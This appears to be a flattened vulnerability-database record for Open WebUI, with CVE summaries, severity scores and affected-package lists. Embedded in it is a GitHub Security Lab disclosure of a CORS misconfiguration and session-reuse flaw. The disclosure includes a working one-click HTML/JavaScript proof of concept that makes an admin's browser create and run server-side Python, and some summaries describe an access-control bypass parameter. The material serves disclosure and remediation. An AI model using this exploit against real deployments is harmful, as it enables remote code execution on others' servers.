reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-j6w6-986j-2m2m
5
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-j6w6-986j-2m2m
reference_id GHSA-j6w6-986j-2m2m
reference_type
scores
0
value 4.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:L
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-18T12:47:40Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-j6w6-986j-2m2m
fixed_packages
0
url pkg:pypi/open-webui@0.9.3
purl pkg:pypi/open-webui@0.9.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1g27-4vq6-7kdz
1
vulnerability VCID-1tu1-b9de-nfaa
2
vulnerability VCID-4v8w-kv6g-kkbc
3
vulnerability VCID-4x63-8x64-d3bq
4
vulnerability VCID-5jna-wvd7-j7cm
5
vulnerability VCID-cw4k-3s8z-uqh8
6
vulnerability VCID-dzh3-rqx4-fqhv
7
vulnerability VCID-ef1t-pxjm-j7cz
8
vulnerability VCID-hj5f-yk3y-ffdg
9
vulnerability VCID-yug9-shts-kufb
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.3
aliases CVE-2026-45317, GHSA-j6w6-986j-2m2m
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-5wfg-zqcy-c7ar
17
url VCID-5wzn-mfwg-ybc3
vulnerability_id VCID-5wzn-mfwg-ybc3
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, the channel router does not call filter_allowed_access_grants on either create or update paths. A non-admin user who can create group channels (or who owns a channel) can submit arbitrary access grants — including public wildcard grants — and those grants are stored verbatim, bypassing the admin's permission framework. This vulnerability is fixed in 0.9.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-44558
reference_id
reference_type
scores
0
value 0.0003
scoring_system epss
scoring_elements 0.09057
published_at 2026-06-14T12:55:00Z
1
value 0.0003
scoring_system epss
scoring_elements 0.09019
published_at 2026-06-11T12:55:00Z
2
value 0.0003
scoring_system epss
scoring_elements 0.09069
published_at 2026-06-13T12:55:00Z
3
value 0.0003
scoring_system epss
scoring_elements 0.09067
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-44558
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-44558
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-44558
3
reference_url https://github.com/advisories/GHSA-7rjh-px4v-5w55
reference_id GHSA-7rjh-px4v-5w55
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-7rjh-px4v-5w55
4
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-7rjh-px4v-5w55
reference_id GHSA-7rjh-px4v-5w55
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-19T12:40:24Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-7rjh-px4v-5w55
fixed_packages
0
url pkg:pypi/open-webui@0.9.0
purl pkg:pypi/open-webui@0.9.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1g27-4vq6-7kdz
1
vulnerability VCID-1tu1-b9de-nfaa
2
vulnerability VCID-4v8w-kv6g-kkbc
3
vulnerability VCID-4x63-8x64-d3bq
4
vulnerability VCID-5jna-wvd7-j7cm
5
vulnerability VCID-5wfg-zqcy-c7ar
6
vulnerability VCID-8nzh-cpda-dkca
7
vulnerability VCID-8y4k-pj2n-8uhm
8
vulnerability VCID-cw4k-3s8z-uqh8
9
vulnerability VCID-dz6g-jgmg-wqce
10
vulnerability VCID-dzh3-rqx4-fqhv
11
vulnerability VCID-ef1t-pxjm-j7cz
12
vulnerability VCID-hj5f-yk3y-ffdg
13
vulnerability VCID-wcz4-vwx4-tufb
14
vulnerability VCID-yug9-shts-kufb
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0
aliases CVE-2026-44558, GHSA-7rjh-px4v-5w55
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-5wzn-mfwg-ybc3
18
url VCID-66zh-9jk7-9bfx
vulnerability_id VCID-66zh-9jk7-9bfx
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.8.0, GET /api/v1/memories/ef is accessible without authentication and executes request.app.state.EMBEDDING_FUNCTION(...). This allows any unauthenticated caller to trigger embedding generation which can lead to direct cost exposure if a paid provider is used. This vulnerability is fixed in 0.8.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-45667
reference_id
reference_type
scores
0
value 0.00018
scoring_system epss
scoring_elements 0.04836
published_at 2026-06-12T12:55:00Z
1
value 0.00018
scoring_system epss
scoring_elements 0.04811
published_at 2026-06-14T12:55:00Z
2
value 0.00018
scoring_system epss
scoring_elements 0.04832
published_at 2026-06-11T12:55:00Z
3
value 0.00018
scoring_system epss
scoring_elements 0.04822
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-45667
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://github.com/open-webui/open-webui/commit/e5035ea31e179977e805a7032c979ff59a71860a
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/commit/e5035ea31e179977e805a7032c979ff59a71860a
3
reference_url https://github.com/open-webui/open-webui/releases/tag/v0.8.0
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/releases/tag/v0.8.0
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-45667
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-45667
5
reference_url https://github.com/advisories/GHSA-m69w-p7m4-585j
reference_id GHSA-m69w-p7m4-585j
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-m69w-p7m4-585j
6
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-m69w-p7m4-585j
reference_id GHSA-m69w-p7m4-585j
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-18T17:51:44Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-m69w-p7m4-585j
fixed_packages
0
url pkg:pypi/open-webui@0.8.0
purl pkg:pypi/open-webui@0.8.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14xt-qwyg-w3cj
1
vulnerability VCID-1g27-4vq6-7kdz
2
vulnerability VCID-1tu1-b9de-nfaa
3
vulnerability VCID-2xdz-v8cw-fygv
4
vulnerability VCID-32yb-vsfs-43a8
5
vulnerability VCID-3436-znsq-guds
6
vulnerability VCID-4rz6-hw32-jueb
7
vulnerability VCID-4v8w-kv6g-kkbc
8
vulnerability VCID-4x63-8x64-d3bq
9
vulnerability VCID-5319-t7jm-y3bx
10
vulnerability VCID-5jna-wvd7-j7cm
11
vulnerability VCID-5wfg-zqcy-c7ar
12
vulnerability VCID-5wzn-mfwg-ybc3
13
vulnerability VCID-6rbm-rm25-hqgy
14
vulnerability VCID-7nbc-ng1s-suck
15
vulnerability VCID-8n6u-wgz9-1bgj
16
vulnerability VCID-8nzh-cpda-dkca
17
vulnerability VCID-8y4k-pj2n-8uhm
18
vulnerability VCID-chug-ma8r-cucc
19
vulnerability VCID-cw4k-3s8z-uqh8
20
vulnerability VCID-dz6g-jgmg-wqce
21
vulnerability VCID-dzh3-rqx4-fqhv
22
vulnerability VCID-ef1t-pxjm-j7cz
23
vulnerability VCID-hj5f-yk3y-ffdg
24
vulnerability VCID-jfs9-dps1-27a2
25
vulnerability VCID-k9jf-5jzd-pkge
26
vulnerability VCID-n4ma-zcpv-5fbp
27
vulnerability VCID-nxvm-97r4-6ybz
28
vulnerability VCID-pkds-1xgn-q3bv
29
vulnerability VCID-pwsg-72yy-quhk
30
vulnerability VCID-q682-k826-efhv
31
vulnerability VCID-qgfh-7u8n-y7c7
32
vulnerability VCID-qjt1-zxx8-r7ht
33
vulnerability VCID-r7vt-4bqm-f7hb
34
vulnerability VCID-reqw-pfm8-c7g5
35
vulnerability VCID-rhhj-rccv-87hw
36
vulnerability VCID-s625-eg1w-gfd1
37
vulnerability VCID-t571-d65a-cyb2
38
vulnerability VCID-u25g-p4nx-gqd1
39
vulnerability VCID-ujye-g4rj-8be5
40
vulnerability VCID-um53-kf7u-kkg6
41
vulnerability VCID-vghe-uuzj-m7cu
42
vulnerability VCID-vkx3-71kv-sugt
43
vulnerability VCID-w2vd-r3hr-w3bt
44
vulnerability VCID-wb88-83cj-ffhy
45
vulnerability VCID-wcz4-vwx4-tufb
46
vulnerability VCID-yug9-shts-kufb
47
vulnerability VCID-yysb-dk2k-f7g4
48
vulnerability VCID-ze3m-g96u-27fc
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.8.0
aliases CVE-2026-45667, GHSA-m69w-p7m4-585j
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-66zh-9jk7-9bfx
19
url VCID-68jf-2utx-x7br
vulnerability_id VCID-68jf-2utx-x7br
summary
Open WebUI has a CORS misconfiguration and session validation issue
# GitHub Security Lab (GHSL) Vulnerability Report, open-webui: `GHSL-2024-174`, `GHSL-2024-175`

The [GitHub Security Lab](https://securitylab.github.com) team has identified potential security vulnerabilities in [open-webui](https://github.com/open-webui/open-webui).

We are committed to working with you to help resolve these issues. In this report you will find everything you need to effectively coordinate a resolution of these issues with the GHSL team.

If at any point you have concerns or questions about this process, please do not hesitate to reach out to us at `securitylab@github.com` (please include `GHSL-2024-174` or `GHSL-2024-175` as a reference). See also [this blog post](https://github.blog/2022-04-22-removing-the-stigma-of-a-cve/) written by GitHub's Advisory Curation team which explains what CVEs and advisories are, why they are important to track vulnerabilities and keep downstream users informed, the CVE assigning process, and how they are used to keep open source software secure.

If you are _NOT_ the correct point of contact for this report, please let us know!

## Summary

Due to a CORS misconfiguration and a session validation issue, an attacker may be able to perform a one-click attack against browsers with admin access to openwebui, resulting in remote code execution on the openwebui instance. The openwebui application runs as root in the Docker container's default setup, which allows for complete compromise of the container.

## Project

open-webui

## Tested Version

[v0.3.10](https://github.com/open-webui/open-webui/releases/tag/v0.3.10)

## Details

### Issue 1: CORS misconfiguration on multiple routers (`GHSL-2024-174`)

CORS misconfigurations exist on multiple routers of open-webui, allowing arbitrary websites to make authenticated cross-site requests to openwebui. Accounts with access to the `/api/v1/functions` endpoint (admins) can execute arbitrary code on the openwebui instance.

The following pattern occurs in each of these routers:
1. [backend/apps/webui/main.py](https://github.com/open-webui/open-webui/blob/v0.3.10/backend/apps/webui/main.py#L92)
2. [backend/apps/audio/main.py](https://github.com/open-webui/open-webui/blob/v0.3.10/backend/apps/audio/main.py#L58)
3. [backend/apps/images/main.py](https://github.com/open-webui/open-webui/blob/v0.3.10/backend/apps/images/main.py#L60)
4. [backend/apps/rag/main.py](https://github.com/open-webui/open-webui/blob/v0.3.10/backend/apps/rag/main.py#L246)
5. [backend/apps/openai/main.py](https://github.com/open-webui/open-webui/blob/v0.3.10/backend/apps/openai/main.py#L47)
6. [backend/apps/ollama/main.py](https://github.com/open-webui/open-webui/blob/v0.3.10/backend/apps/ollama/main.py#L62)
7. [backend/main.py](https://github.com/open-webui/open-webui/blob/v0.3.10/backend/main.py#L881)
```python
app.add_middleware(
    CORSMiddleware,
    allow_origins=["*"],
    allow_credentials=True,
    allow_methods=["*"],
    allow_headers=["*"],
)
```

#### Impact

This issue may lead to `Remote Code Execution`.

#### Remediation

The FastAPI CORS middleware is not safe by default: when `allow_origins=["*"]` is combined with `allow_credentials=True`, as above, it reflects the requesting origin back in the response. Remove the broad origin and let administrators set the exact allowed origins via the administration panel or config file; do not accept broad patterns such as `"*"` or `"*.com"`.
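As an added illustration of this remediation (not open-webui's own code), the origin-reflecting policy the report describes sits beside an explicit allow-list policy that rejects wildcard entries and only ever credentials exact, admin-configured origins. The origin values are constructed samples, and the cleaned list is what a deployment would pass to `CORSMiddleware(allow_origins=...)`.

```python
"""Added example, not open-webui code: reflecting CORS policy vs. an explicit
origin allow-list. Origin values below are constructed samples."""
from urllib.parse import urlsplit

# Constructed config values: what an admin might enter in a config file or panel.
ORIGINS_V0_3_10 = ["*"]  # the broad default the report flags
ORIGINS_HARDENED = ["https://chat.example.com", "http://localhost:3000"]  # assumed


def normalise_origin(origin: str) -> str:
    """Return the canonical 'scheme://host[:port]' form or raise ValueError.

    Refuses anything that is not one exact origin: '*', '*.com', a bare host
    without a scheme, or a URL carrying a path, query or fragment.
    """
    if "*" in origin:
        raise ValueError(f"wildcard origin not allowed: {origin!r}")
    parts = urlsplit(origin)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        raise ValueError(f"origin must be scheme://host[:port]: {origin!r}")
    if parts.path not in ("", "/") or parts.query or parts.fragment:
        raise ValueError(f"origin must not carry a path or query: {origin!r}")
    return f"{parts.scheme}://{parts.netloc.lower()}"


def validate_allowed_origins(origins):
    """Normalise an admin-supplied allow-list; one bad entry rejects the whole config."""
    return sorted({normalise_origin(o) for o in origins})


def reflecting_cors_headers(request_origin):
    """Model of the vulnerable behaviour: with allow_origins=['*'] and
    allow_credentials=True the middleware echoes whatever Origin arrives,
    so any site can make credentialed requests."""
    if request_origin is None:
        return {}
    return {
        "Access-Control-Allow-Origin": request_origin,
        "Access-Control-Allow-Credentials": "true",
    }


def allowlist_cors_headers(request_origin, allowed_origins):
    """Hardened behaviour: only an exact, configured origin is echoed back.

    An unlisted Origin (attacker.com in the report) gets no CORS headers at
    all, so the browser withholds the response from the cross-site fetch.
    """
    allowed = validate_allowed_origins(allowed_origins)
    if request_origin is None:
        return {}
    try:
        origin = normalise_origin(request_origin)
    except ValueError:
        return {}
    if origin not in allowed:
        return {}
    return {
        "Access-Control-Allow-Origin": origin,
        "Access-Control-Allow-Credentials": "true",
        # Vary on Origin so a cache never serves one origin's headers to another.
        "Vary": "Origin",
    }


if __name__ == "__main__":
    attacker = "https://attacker.com"
    print("reflecting:", reflecting_cors_headers(attacker))
    print("allow-list:", allowlist_cors_headers(attacker, ORIGINS_HARDENED))
    try:
        validate_allowed_origins(ORIGINS_V0_3_10)
    except ValueError as err:
        print("config rejected:", err)
```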

#### Proof of Concept

Host the following code on your website, `attacker.com`. Open the webpage using Firefox, and click on the webpage as instructed. Check your openwebui host to see the result of the command `whoami` placed into a newly created file `/tmp/whoami.txt`. Ensure you have logged into an admin open-webui account.
```html
<body>
  <p>Click here to login.</p>
  <div id="response"></div>

  <script>
    // Firefox cross-site cookie request bypass
    const url = 'http://localhost:3000/static/favicon.png';
    document.addEventListener("DOMContentLoaded", () => {
      document.onclick = () => {
        open(url);
        filter_id = "okok"
        // Create a function/filter to write code
        fetch('http://localhost:3000/api/v1/functions/create', {
          method: 'POST',
          headers: {
            'Content-Type': 'application/json'
          },
          body: JSON.stringify({
            "id": filter_id,
            "name": "test2",
            "meta": {"description": "test2"},
            "content": "from pydantic import BaseModel, Field\nfrom typing import Optional\n\n\nclass Filter:\n    class Valves(BaseModel):\n        priority: int = Field(\n            default=0, description=\"Priority level for the filter operations.\"\n        )\n        max_turns: int = Field(\n            default=8, description=\"Maximum allowable conversation turns for a user.\"\n        )\n        pass\n\n    class UserValves(BaseModel):\n        max_turns: int = Field(\n            default=4, description=\"Maximum allowable conversation turns for a user.\"\n        )\n        pass\n\n    def __init__(self):\n        # Indicates custom file handling logic. This flag helps disengage default routines in favor of custom\n        # implementations, informing the WebUI to defer file-related operations to designated methods within this class.\n        # Alternatively, you can remove the files directly from the body in from the inlet hook\n        # self.file_handler = True\n\n        # Initialize 'valves' with specific configurations. Using 'Valves' instance helps encapsulate settings,\n        # which ensures settings are managed cohesively and not confused with operational flags like 'file_handler'.\n        self.valves = self.Valves()\n        f = open(\"/tmp/whoami.txt\", \"w\")\n        import subprocess\n\n        output = subprocess.getoutput(\"whoami\")\n        f.write(output)\n        f.close()\n        pass\n\n    def inlet(self, body: dict, __user__: Optional[dict] = None) -> dict:\n        return body\n\n    def outlet(self, body: dict, __user__: Optional[dict] = None) -> dict:\n        return body\n"
          }),
          credentials: 'include' // This will send cookies from the origin
        })
        .then(response => response.json())
        .then(data => console.log(data))
        .catch((error) => console.error('Error:', error));

        // Toggle the filter to execute code
        fetch(`http://localhost:3000/api/v1/functions/id/${filter_id}/toggle`, {
          method: 'POST',
          credentials: 'include' // This will send cookies from the origin
        })
        .then(response => response.json())
        .then(data => console.log(data))
        .catch((error) => console.error('Error:', error));
      }
    });
  </script>
</body>
```

### Issue 2: Failure to Invalidate Session on Logout (`GHSL-2024-175`)

Openwebui fails to invalidate and clear session cookies after logout. In fact, it seems to reuse the same session cookies. This allows an attacker who has access to previous session cookie details to log in at a later point as long as the victim has not closed their browser.

This vulnerability is relevant to the above CORS issue because exploitation no longer requires the user to be logged in. If the cookie had been properly invalidated and cleared, the CORS issue would only affect logged-in users.

#### Impact

This issue may increase the impact of primitives gained from other security issues.

#### Remediation

For every session, new cookies should be generated. When a user logs out, the session cookies from the previous session should be invalidated server-side and removed from the browser's storage.
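As an added example of this remediation (not open-webui's own code), a server-side session registry in which every login mints a fresh token and logout both revokes it server-side and sends the header that clears the browser copy; the cookie name and store layout are assumptions for the illustration.

```python
"""Added example, not open-webui code: per-login session tokens with
server-side revocation on logout. Cookie name and class names are assumed."""
import hashlib
import secrets
import time
from typing import Dict, Optional, Tuple

COOKIE_NAME = "session"  # assumed; not necessarily the cookie name open-webui uses


def _fingerprint(token: str) -> str:
    """Store only a hash so a leaked session table cannot be replayed as cookies."""
    return hashlib.sha256(token.encode()).hexdigest()


class SessionStore:
    def __init__(self, ttl_seconds: int = 3600):
        self.ttl = ttl_seconds
        # token hash -> (user id, absolute expiry time)
        self._sessions: Dict[str, Tuple[str, float]] = {}

    def login(self, user_id: str, now: Optional[float] = None) -> str:
        """Every login gets a new unpredictable token; an old one is never reused."""
        now = time.time() if now is None else now
        token = secrets.token_urlsafe(32)
        self._sessions[_fingerprint(token)] = (user_id, now + self.ttl)
        return token

    def user_for(self, token: Optional[str], now: Optional[float] = None) -> Optional[str]:
        """Resolve a cookie value to a user, or None if unknown, revoked or expired."""
        if not token:
            return None
        now = time.time() if now is None else now
        key = _fingerprint(token)
        entry = self._sessions.get(key)
        if entry is None:
            return None
        user_id, expires_at = entry
        if now >= expires_at:
            self._sessions.pop(key, None)  # lazy expiry
            return None
        return user_id

    def logout(self, token: Optional[str]) -> str:
        """Revoke server-side and return the Set-Cookie header that clears the browser copy."""
        if token:
            self._sessions.pop(_fingerprint(token), None)
        return clearing_set_cookie()


def set_cookie_header(token: str) -> str:
    # SameSite=Lax keeps the cookie off cross-site POSTs, a second line of
    # defence against the CORS issue above; HttpOnly keeps it away from script.
    return f"{COOKIE_NAME}={token}; Path=/; HttpOnly; Secure; SameSite=Lax"


def clearing_set_cookie() -> str:
    # Max-Age=0 instructs the browser to delete the cookie immediately.
    return f"{COOKIE_NAME}=; Path=/; HttpOnly; Secure; SameSite=Lax; Max-Age=0"


if __name__ == "__main__":
    store = SessionStore(ttl_seconds=60)
    first = store.login("alice")
    print(set_cookie_header(first))
    print("before logout:", store.user_for(first))
    print(store.logout(first))
    print("after logout:", store.user_for(first))
    print("fresh token differs:", store.login("alice") != first)
```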

#### Resources
[OWASP Recommendation On Sessions](https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html)

## GitHub Security Advisories

We recommend you create a private [GitHub Security Advisory](https://help.github.com/en/github/managing-security-vulnerabilities/creating-a-security-advisory) for these findings. This also allows you to invite the GHSL team to collaborate and further discuss these findings in private before they are [published](https://help.github.com/en/github/managing-security-vulnerabilities/publishing-a-security-advisory).

## Credit

These issues were discovered and reported by GHSL team member [@Kwstubbs (Kevin Stubbings)](https://github.com/Kwstubbs).

## Contact

You can contact the GHSL team at `securitylab@github.com`, please include a reference to `GHSL-2024-174` or `GHSL-2024-175` in any communication regarding these issues.

## Disclosure Policy

This report is subject to a 90-day disclosure deadline, as described in more detail in our [coordinated disclosure policy](https://securitylab.github.com/advisories#policy).
references
0
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 8.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
1
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-6xcp-7mpr-m7wm
reference_id
reference_type
scores
0
value 8.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/security/advisories/GHSA-6xcp-7mpr-m7wm
2
reference_url https://github.com/advisories/GHSA-6xcp-7mpr-m7wm
reference_id GHSA-6xcp-7mpr-m7wm
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-6xcp-7mpr-m7wm
fixed_packages
0
url pkg:pypi/open-webui@0.3.33
purl pkg:pypi/open-webui@0.3.33
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14xt-qwyg-w3cj
1
vulnerability VCID-1g27-4vq6-7kdz
2
vulnerability VCID-1svn-zazq-e3f2
3
vulnerability VCID-1tu1-b9de-nfaa
4
vulnerability VCID-2rs8-62x1-s7h7
5
vulnerability VCID-2xdz-v8cw-fygv
6
vulnerability VCID-32yb-vsfs-43a8
7
vulnerability VCID-3436-znsq-guds
8
vulnerability VCID-4rz6-hw32-jueb
9
vulnerability VCID-4sn4-mrbm-dfgh
10
vulnerability VCID-4v8w-kv6g-kkbc
11
vulnerability VCID-4x63-8x64-d3bq
12
vulnerability VCID-5319-t7jm-y3bx
13
vulnerability VCID-5jna-wvd7-j7cm
14
vulnerability VCID-5wfg-zqcy-c7ar
15
vulnerability VCID-5wzn-mfwg-ybc3
16
vulnerability VCID-66zh-9jk7-9bfx
17
vulnerability VCID-6rbm-rm25-hqgy
18
vulnerability VCID-7j5a-pu4k-kucf
19
vulnerability VCID-7nbc-ng1s-suck
20
vulnerability VCID-8n6u-wgz9-1bgj
21
vulnerability VCID-8nzh-cpda-dkca
22
vulnerability VCID-8y4k-pj2n-8uhm
23
vulnerability VCID-94nj-qkdf-xfhn
24
vulnerability VCID-9jud-sr2a-8yc3
25
vulnerability VCID-9zyk-459z-x3a4
26
vulnerability VCID-chug-ma8r-cucc
27
vulnerability VCID-cw4k-3s8z-uqh8
28
vulnerability VCID-dz6g-jgmg-wqce
29
vulnerability VCID-dzh3-rqx4-fqhv
30
vulnerability VCID-ef1t-pxjm-j7cz
31
vulnerability VCID-gw77-ux3j-qfaa
32
vulnerability VCID-hj5f-yk3y-ffdg
33
vulnerability VCID-jfs9-dps1-27a2
34
vulnerability VCID-jnsg-u9dy-r3d5
35
vulnerability VCID-k17g-bd9g-67f7
36
vulnerability VCID-k9jf-5jzd-pkge
37
vulnerability VCID-mn21-kwuu-w7by
38
vulnerability VCID-n4ma-zcpv-5fbp
39
vulnerability VCID-nxvm-97r4-6ybz
40
vulnerability VCID-pkds-1xgn-q3bv
41
vulnerability VCID-pvep-chj7-ekeg
42
vulnerability VCID-pwsg-72yy-quhk
43
vulnerability VCID-q682-k826-efhv
44
vulnerability VCID-qgfh-7u8n-y7c7
45
vulnerability VCID-qjt1-zxx8-r7ht
46
vulnerability VCID-r7vt-4bqm-f7hb
47
vulnerability VCID-reqw-pfm8-c7g5
48
vulnerability VCID-rhhj-rccv-87hw
49
vulnerability VCID-s625-eg1w-gfd1
50
vulnerability VCID-t571-d65a-cyb2
51
vulnerability VCID-tz2k-gazs-mqgd
52
vulnerability VCID-u25g-p4nx-gqd1
53
vulnerability VCID-ujye-g4rj-8be5
54
vulnerability VCID-um53-kf7u-kkg6
55
vulnerability VCID-vghe-uuzj-m7cu
56
vulnerability VCID-vkx3-71kv-sugt
57
vulnerability VCID-w2vd-r3hr-w3bt
58
vulnerability VCID-wb88-83cj-ffhy
59
vulnerability VCID-wcz4-vwx4-tufb
60
vulnerability VCID-yug9-shts-kufb
61
vulnerability VCID-yysb-dk2k-f7g4
62
vulnerability VCID-ze3m-g96u-27fc
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.3.33
aliases GHSA-6xcp-7mpr-m7wm
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-68jf-2utx-x7br
20
url VCID-6rbm-rm25-hqgy
vulnerability_id VCID-6rbm-rm25-hqgy
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.8.11, an internal-only bypass_filter parameter is exposed on the /openai/chat/completions and /ollama/api/chat HTTP endpoints via FastAPI query string binding, allowing any authenticated user to append ?bypass_filter=true and bypass model access control checks to invoke admin-restricted models. This vulnerability is fixed in 0.8.11.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-45365
reference_id
reference_type
scores
0
value 0.0003
scoring_system epss
scoring_elements 0.09067
published_at 2026-06-12T12:55:00Z
1
value 0.0003
scoring_system epss
scoring_elements 0.09057
published_at 2026-06-14T12:55:00Z
2
value 0.0003
scoring_system epss
scoring_elements 0.09019
published_at 2026-06-11T12:55:00Z
3
value 0.0003
scoring_system epss
scoring_elements 0.09069
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-45365
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://github.com/open-webui/open-webui/commit/c0385f60ba049da48d2d5452068586d375303c37
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/commit/c0385f60ba049da48d2d5452068586d375303c37
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-45365
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-45365
4
reference_url https://github.com/advisories/GHSA-v6qf-75pr-p96m
reference_id GHSA-v6qf-75pr-p96m
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-v6qf-75pr-p96m
5
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-v6qf-75pr-p96m
reference_id GHSA-v6qf-75pr-p96m
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
